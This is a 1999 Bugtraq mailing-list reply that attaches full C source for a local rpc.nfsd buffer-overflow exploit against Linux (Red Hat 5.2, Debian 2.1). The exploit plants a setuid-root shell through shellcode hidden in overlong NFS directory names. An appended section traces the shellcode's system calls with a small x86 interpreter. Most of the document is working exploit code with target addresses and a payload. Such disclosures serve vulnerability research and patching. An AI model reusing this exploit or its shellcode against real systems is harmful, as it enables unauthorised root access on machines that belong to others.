[12559] in bugtraq


Re: rpc.nfsd exploit code

daemon@ATHENA.MIT.EDU (Mariusz Marcinkiewicz)
Fri Nov 12 15:12:06 1999

Message-Id:  <Pine.LNX.4.20.9911120857240.3164-200000@mail.zigzag.pl>
Date:         Fri, 12 Nov 1999 09:07:02 +0100
Reply-To: Mariusz Marcinkiewicz <tmogg@ZIGZAG.PL>
From: Mariusz Marcinkiewicz <tmogg@ZIGZAG.PL>
X-To:         Crispin Cowan <crispin@cse.ogi.edu>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To:  <382B40EE.A0DEC6C0@cse.ogi.edu>

Hi

On Thu, 11 Nov 1999, Crispin Cowan wrote:

> We were unable to get this sploit to actually produce a root shell on an
> unprotected nfsd.

Sorry, this version of the exploit wasn't tested well. Maybe it doesn't work
in some cases.

I attached the old version of the rpc.nfsd exploit. This one is local only;
the shellcode will do "chown root /tmp/blah; chmod +s /tmp/blah". It should
work for you.


best regards,
	tmoggie

__
Mariusz Marcinkiewicz | phone: +48 601 080 286 | mail: many@rast.lodz.pdi.net
System Administrator && Tech Support  <tmogg@zigzag.pl>  http://www.zigzag.pl
Security Advisor [*] tmogg@hert.org || tmogg@hack.dk  [*] http://www.hert.org

[attachment: 3nfsd.c, decoded from the base64 MIME part]

/*
 * rpc.nfsd exploit for Linux
 *
 * author: tmoggie
 * greetz:
 *         DiGiT - bug discovering,
 *         kil3r, maxiu and all of lam3rZ GrP
 */

#include <stdio.h>      /* added: printf() */
#include <stdlib.h>     /* added: exit(), system(), atoi() */
#include <sys/stat.h>
#include <sys/types.h>
#include <fcntl.h>
#include <unistd.h>
#include <string.h>
#include <strings.h>    /* added: bzero() */

#define green "\E[32m"
#define bold "\E[1m"
#define normal "\E[m"
#define red "\E[31m"

// shellcode from maxiu
// chmod 4777 /tmp/blah
// (setreuid(0,0); lchown("/tmp/blah",0,0); chmod("/tmp/blah",04777); exit(0);
//  the path is stored as ".tmp.blah\xff" and patched to "/tmp/blah\0" at run
//  time so that the component contains neither '/' nor a NUL byte)
char shell[] = "\xeb\x2d\x5e\xfe\x06\xfe\x46\x04\xfe\x46\x09\x31\xc9\x31\xdb"
               "\x31\xc0\xb0\x46\xcd\x80\x31\xd2\x89\xf3\xb0\x10\xcd\x80\x66"
               "\xb9\xff\x09\x89\xf3\xb0\x0f\xcd\x80\x31\xdb\x89\xd8\xfe\xc0"
               "\xcd\x80\xe8\xce\xff\xff\xff.tmp.blah\xff\xff\xff\xff/";

/* -c command. A writable array: the original pointed cmd at a string
   literal and then strcpy()'d into it, which is undefined behaviour. */
char cmd[4096] = "cp /bin/sh /tmp/blah";

int offset;


void usage(char *prog)
 {
 printf("\nusage: %s <-e dir> [-t target] [-c command] \n",prog);
  printf("\n   -e dir    : full path to exported directory\n");
  printf("   -t target : ");
  printf("1 - RH 5.2 (default)   2 - Debian 2.1\n");
  printf("   -c command: cmd to do as a normal user" \
         " (default: cp /bin/sh /tmp/blah)\n\n");
  exit(0);
 }

int main(int argc, char **argv)
 {
  int i,j;
  char buf[4096];          /* the full path handed to mkdir(), grown one component at a time */
  char tmp[4096];          /* the component being appended */

  char exp[255] = "!";     /* -e: exported directory ("!" = not given) */
  int addr = 0xbffff667 ;  /* default RH 5.2 */

  while (1)
   {
     i = getopt(argc,argv,"e:c:t:h");
     if (i == -1) break;
     switch (i)
      {
       case 'e': strcpy(exp,optarg); break;
       case 'c': strcpy(cmd,optarg); break;
       case 't': switch (j=atoi(optarg))
                   {
                     case 1: addr = 0xbffff667; break; // RH 5.2 (matches usage and the default)
                     case 2: addr = 0xbffff655; break; // Debian 2.1
                   }
                 break;  /* added: the original fell through into usage() on every -t */
       default : usage(argv[0]); break;
      }
   }
  if (!strcmp(exp,"!")) usage(argv[0]);

  /* step 1: run the command as the normal user (by default, drop a copy of
     /bin/sh in /tmp/blah for the shellcode to chown root and chmod 4777) */
  printf(bold"cmd");
  if (system(cmd) != 0)
    {
      printf(red"....failed!\n"normal);
      exit(-1);
    }
  printf(normal green"\tOk\n"normal);

  /* step 2: build a deeply nested tree inside the export, one mkdir() per
     component, so the total path has a fixed layout */
  offset = strlen(exp);
  if (exp[offset-1] != '/') strcat(exp,"/");
  offset = strlen(exp);
  bzero(buf,sizeof(buf));
  memset(tmp,'A',255);    /* three components of 255 'A's, the longest name allowed */
  tmp[255]='/';
  tmp[256]='\0';
  strncpy(buf,exp,offset);
  printf(bold"dirs");
  for (i=1;i<=3;i++)
   {
    strncat(buf,tmp,strlen(tmp));
    if (mkdir(buf,0777) < 0)
      {
       printf(red"...fuck! can't create directory!!! : %d\n"normal,i);
       exit(-1);
      }
   }
  /* padding component: export prefix plus this component come to exactly
     256 bytes, so what follows lands at the same offset whatever the export
     path length is */
  memset(tmp,'A',255);
  tmp[255-offset]='/';
  tmp[256-offset]='\0';
  strncat(buf,tmp,strlen(tmp));
  if (mkdir(buf,0777) < 0)
   {
    /* '%' doubled: the original string was an invalid printf format */
    printf(red"...fuqn offset dirW#$#@%%#$^%%T#\n"normal);
    exit(-1);
   }
  /* shellcode component: NOP sled, then the shellcode (which ends in '/') */
  memset(tmp,'\x90',255);
  strcpy(tmp+(255-strlen(shell)),shell);
  strncat(buf,tmp,strlen(tmp));
  if (mkdir(buf,0777) < 0)
   {
    printf(red"...fuck!@# shell-dir\n"normal);
    exit(-1);
   }
  /* return-address component: 93 bytes of filler, then the target address */
  memset(tmp,'a',255);
  tmp[97] = '\0';
  *((int*)(tmp+93)) = addr;
  strncat(buf,tmp,strlen(tmp));
  if (mkdir(buf,0777) < 0)
   {
    printf(red"...fuck!@#!@#!$ addrez-dir ^\n"normal);
    exit(-1);
   }
  printf(normal green"\tOk\n"normal);
  /* step 3: removing the tree through the NFS mount makes the server's
     rpc.nfsd process the overlong path */
  printf("now you have to do: "bold green \
         "rm -rf /path-to-mount-point/A[tab] & \n\n"normal);
  return 0;
}
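What the attached shellcode actually does, as an added example that is not part of the original post or of 3nfsd.c: a small interpreter written for this page that implements only the x86 opcodes the shellcode uses, runs its self-modifying prologue, and records each int 0x80 with its register arguments. The byte string is copied from the attachment; the syscall numbers (1 exit, 15 chmod, 16 lchown, 70 setreuid) are those of i386 Linux, the target the exploit is written for, and a little-endian host is assumed for the immediate reads.

```c
#include <stdio.h>
#include <string.h>
#include <stdint.h>

/* Shellcode bytes copied from the attached 3nfsd.c. */
static const unsigned char shell[] =
    "\xeb\x2d\x5e\xfe\x06\xfe\x46\x04\xfe\x46\x09\x31\xc9\x31\xdb"
    "\x31\xc0\xb0\x46\xcd\x80\x31\xd2\x89\xf3\xb0\x10\xcd\x80\x66"
    "\xb9\xff\x09\x89\xf3\xb0\x0f\xcd\x80\x31\xdb\x89\xd8\xfe\xc0"
    "\xcd\x80\xe8\xce\xff\xff\xff.tmp.blah\xff\xff\xff\xff/";

/* i386 Linux syscall numbers (assumed target of the exploit). */
enum { SYS_exit_nr = 1, SYS_chmod_nr = 15, SYS_lchown_nr = 16, SYS_setreuid_nr = 70 };

struct syscall_rec {
    uint32_t nr, ebx, ecx, edx;
    char path[64];              /* string at ebx when the call takes a path */
};

/* Interprets just the opcodes this shellcode uses and records every
 * int 0x80. Returns the number of records, or -1 on an unknown opcode,
 * an out-of-range memory reference or a stack misuse. */
int trace_shellcode(const unsigned char *code, size_t len,
                    struct syscall_rec *out, int max)
{
    uint8_t mem[256];
    uint32_t eax = 0, ebx = 0, ecx = 0, edx = 0, esi = 0, eip = 0;
    uint32_t stack[8];
    int sp = 0, n = 0;

    if (len + 8 > sizeof mem) return -1;   /* keep a zeroed tail for string reads */
    memset(mem, 0, sizeof mem);
    memcpy(mem, code, len);

    while (eip < len && n < max) {
        uint8_t op = mem[eip], m = mem[eip + 1];
        switch (op) {
        case 0xeb:                                   /* jmp rel8 */
            eip += 2 + (int8_t)m; break;
        case 0xe8: {                                 /* call rel32: pushes the return address */
            int32_t rel; memcpy(&rel, mem + eip + 1, 4);
            if (sp == 8) return -1;
            stack[sp++] = eip + 5; eip += 5 + rel; break; }
        case 0x5e:                                   /* pop esi: esi = address of ".tmp.blah" */
            if (sp == 0) return -1;
            esi = stack[--sp]; eip += 1; break;
        case 0xfe:                                   /* inc byte [esi] / [esi+d8] / inc al */
            if (m == 0x06)      { if (esi >= sizeof mem) return -1; mem[esi]++; eip += 2; }
            else if (m == 0x46) { uint32_t a = esi + mem[eip + 2];
                                  if (a >= sizeof mem) return -1; mem[a]++; eip += 3; }
            else if (m == 0xc0) { eax = (eax & ~0xffu) | ((eax + 1) & 0xff); eip += 2; }
            else return -1;
            break;
        case 0x31:                                   /* xor reg,reg: zero without NUL bytes */
            if (m == 0xc0) eax = 0; else if (m == 0xdb) ebx = 0;
            else if (m == 0xc9) ecx = 0; else if (m == 0xd2) edx = 0;
            else return -1;
            eip += 2; break;
        case 0x89:                                   /* mov ebx,esi / mov eax,ebx */
            if (m == 0xf3) ebx = esi; else if (m == 0xd8) eax = ebx;
            else return -1;
            eip += 2; break;
        case 0xb0:                                   /* mov al,imm8: the syscall number */
            eax = (eax & ~0xffu) | m; eip += 2; break;
        case 0x66:                                   /* mov cx,imm16: the chmod mode */
            if (m != 0xb9) return -1;
            ecx = (ecx & 0xffff0000u) | mem[eip + 2] | ((uint32_t)mem[eip + 3] << 8);
            eip += 4; break;
        case 0xcd:                                   /* int 0x80: record the call */
            if (m != 0x80) return -1;
            out[n].nr = eax; out[n].ebx = ebx; out[n].ecx = ecx; out[n].edx = edx;
            out[n].path[0] = '\0';
            if ((eax == SYS_chmod_nr || eax == SYS_lchown_nr) && ebx < sizeof mem)
                snprintf(out[n].path, sizeof out[n].path, "%s", (char *)mem + ebx);
            n++;
            if (eax == SYS_exit_nr) return n;        /* exit: the trace is complete */
            eip += 2; break;
        default:
            return -1;
        }
    }
    return n;
}

/* Traces the attached shellcode into g_trace and returns the call count. */
struct syscall_rec g_trace[8];
int trace_attached_shellcode(void)
{
    return trace_shellcode(shell, sizeof shell - 1, g_trace, 8);
}

int main(void)
{
    int n = trace_attached_shellcode();
    for (int i = 0; i < n; i++)
        printf("int 0x80  eax=%-3u ebx=0x%-8x ecx=0%-6o edx=%u  %s\n",
               g_trace[i].nr, g_trace[i].ebx, g_trace[i].ecx,
               g_trace[i].edx, g_trace[i].path);
    return n < 0;
}
```

Run, it lists four calls: setreuid(0,0), lchown("/tmp/blah",0,0), chmod("/tmp/blah",04777) and exit(0), which is the "chown root; chmod +s" the mail describes. The path is stored as ".tmp.blah\xff": the three inc byte instructions turn the two dots into slashes and the trailing 0xff into the NUL terminator, so the component the exploit passes to mkdir() contains neither a '/' (which would split it) nor a zero byte (which would end it). The 0x09ff in mov cx,0x09ff is 04777, the mode the source comment calls "chmod 4777".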
